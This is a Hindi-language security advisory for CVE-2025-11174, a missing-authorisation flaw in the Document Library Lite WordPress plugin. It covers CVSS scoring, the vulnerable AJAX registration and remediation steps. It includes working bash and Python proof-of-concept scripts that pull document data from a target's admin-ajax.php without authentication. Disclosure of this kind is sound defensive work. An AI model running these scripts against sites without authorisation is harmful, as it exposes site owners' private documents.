
दस्तावेज़ लाइब्रेरी लाइट <= 1.1.6 - संवेदनशील जानकारी के प्रकटीकरण के लिए अनधिकृत पहुंच की कमी | CVE-2025-11174
कीवर्ड: CVE-2025-11174, Document Library Lite कमजोरी, सूचना प्रकटीकरण, WordPress सुरक्षा, बिना प्रमाणीकरण का AJAX शोषण, WordPress प्लगइन कमजोरी, CWE-862, WordPress दस्तावेज़ प्लगइन सुरक्षा, प्राधिकरण बाईपास, WordPress CVE 2025
Document Library Lite WordPress प्लगइन सूचना प्रकटीकरण कमजोरी (CVE-2025-11174) – सुरक्षा दोष जो WordPress दस्तावेज़ लाइब्रेरी प्लगइन में संवेदनशील दस्तावेज़ डेटा तक बिना प्रमाणीकरण के पहुंच की अनुमति देता है।
एक महत्वपूर्ण प्राधिकरण बाईपास कमजोरी Document Library Lite WordPress प्लगइन में खोजी गई है, जो बिना प्रमाणीकरण के हमलावरों को संवेदनशील दस्तावेज़ जानकारी तक पहुंचने की अनुमति देती है।
खोजकर्ता: Kai Aizen और Avraham Shemesh (SnailSploit)
प्रकाशित: 1 नवंबर 2025
CVSS स्कोर: 5.3 (मध्यम)
CWE: CWE-862 – अनुपस्थित प्राधिकरण
प्लगइन: Document Library Lite
विक्रेता: Barn2 Plugins
हमले का प्रकार: बिना प्रमाणीकरण के सूचना प्रकटीकरण
आवश्यक विशेषाधिकार: कोई नहीं (बिना प्रमाणीकरण का हमला)
Document Library Lite प्लगइन (WordPress के लिए) में सभी संस्करणों तक 1.1.6 तक एक अनुचित प्राधिकरण कमजोरी है। प्लगइन एक बिना प्रमाणीकरण के AJAX एक्शन dll_load_posts को उजागर करता है जो बिना nonce या क्षमता जांच के दस्तावेज़ डेटा की JSON तालिका लौटाता है।
यह कमजोरी बिना प्रमाणीकरण के हमलावरों को इसकी अनुमति देती है:
नोट: 5.3 का CVSS स्कोर (मध्यम गंभीरता) सीमित सूचना प्रकटीकरण को दर्शाता है। जबकि कमजोरी दस्तावेज़ डेटा तक बिना प्रमाणीकरण के पहुंच की अनुमति देती है, गोपनीयता पर प्रभाव को निम्न (Low) के रूप में रेट किया गया है, जिसका अखंडता या उपलब्धता पर कोई प्रभाव नहीं है।
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
| मीट्रिक | मान |
|---|---|
| हमला वेक्टर | नेटवर्क (AV:N) |
| हमला जटिलता | निम्न (AC:L) |
| आवश्यक विशेषाधिकार | कोई नहीं (PR:N) |
| उपयोगकर्ता सहभागिता | कोई नहीं (UI:N) |
| दायरा | अपरिवर्तित (S:U) |
| गोपनीयता | निम्न (C:L) |
| अखंडता | कोई नहीं (I:N) |
| उपलब्धता | कोई नहीं (A:N) |
CVSS v3.1 विवरण:
AJAX एक्शन dll_load_posts उचित प्रमाणीकरण या प्राधिकरण जांच के बिना पंजीकृत है:
// कमजोर कोड पैटर्न (सरलीकृत)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
wp_ajax_nopriv_ उपसर्ग इंगित करता है कि यह एक्शन बिना प्रमाणीकरण वाले उपयोगकर्ताओं के लिए सुलभ है, और कॉलबैक फ़ंक्शन इन्हें लागू नहीं करता है:
POST /wp-admin/admin-ajax.php
action=dll_load_posts
कमजोरी का शोषण बिना प्रमाणीकरण के WordPress के admin-ajax.php एंडपॉइंट के माध्यम से किया जा सकता है।
⚠️ केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए
#!/bin/bash
# CVE-2025-11174 PoC
TARGET_URL="$1"
if [ -z "$TARGET_URL" ]; then
echo "उपयोग: $0 <लक्ष्य_url>"
echo "उदाहरण: $0 https://example.com"
exit 1
fi
echo "[*] CVE-2025-11174 - Document Library Lite सूचना प्रकटीकरण PoC"
echo "[*] लक्ष्य: $TARGET_URL"
echo ""
# कमजोर AJAX एंडपॉइंट पर अनुरोध भेजें
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=dll_load_posts" \
| python3 -m json.tool
echo ""
echo "[+] यदि आप ऊपर दस्तावेज़ डेटा देखते हैं, तो साइट कमजोर है!"
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite सूचना प्रकटीकरण PoC
केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए
"""
import requests
import sys
import json
def exploit(target_url):
ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
print(f"[*] लक्ष्य: {target_url}")
print(f"[*] AJAX एंडपॉइंट: {ajax_url}\n")
data = {'action': 'dll_load_posts'}
try:
response = requests.post(ajax_url, data=data, timeout=10)
if response.status_code == 200:
print("[+] अनुरोध सफल!\n")
try:
json_data = response.json()
print("[+] प्राप्त दस्तावेज़ डेटा:")
print(json.dumps(json_data, indent=2))
print("\n[!] साइट CVE-2025-11174 के लिए कमजोर है")
except json.JSONDecodeError:
print("[-] कोई JSON प्रतिक्रिया प्राप्त नहीं हुई")
print(f"प्रतिक्रिया: {response.text[:200]}")
else:
print(f"[-] अनुरोध स्थिति कोड के साथ विफल: {response.status_code}")
except requests.RequestException as e:
print(f"[-] त्रुटि: {e}")
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"उपयोग: {sys.argv[0]} <लक्ष्य_url>")
print(f"उदाहरण: {sys.argv[0]} https://example.com")
sys.exit(1)
target = sys.argv[1]
exploit(target)
तत्काल कार्रवाई आवश्यक:
action=dll_load_posts के साथ admin-ajax.php पर संदिग्ध POST अनुरोधों के लिए अपनी साइट के एक्सेस लॉग की समीक्षा करेंWordPress प्रशासन के माध्यम से:
WP-CLI का उपयोग करके:
wp plugin update document-library-lite
सुनिश्चित करें कि सभी AJAX हैंडलर उचित सुरक्षा नियंत्रण लागू करें:
// उचित AJAX सुरक्षा का उदाहरण
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');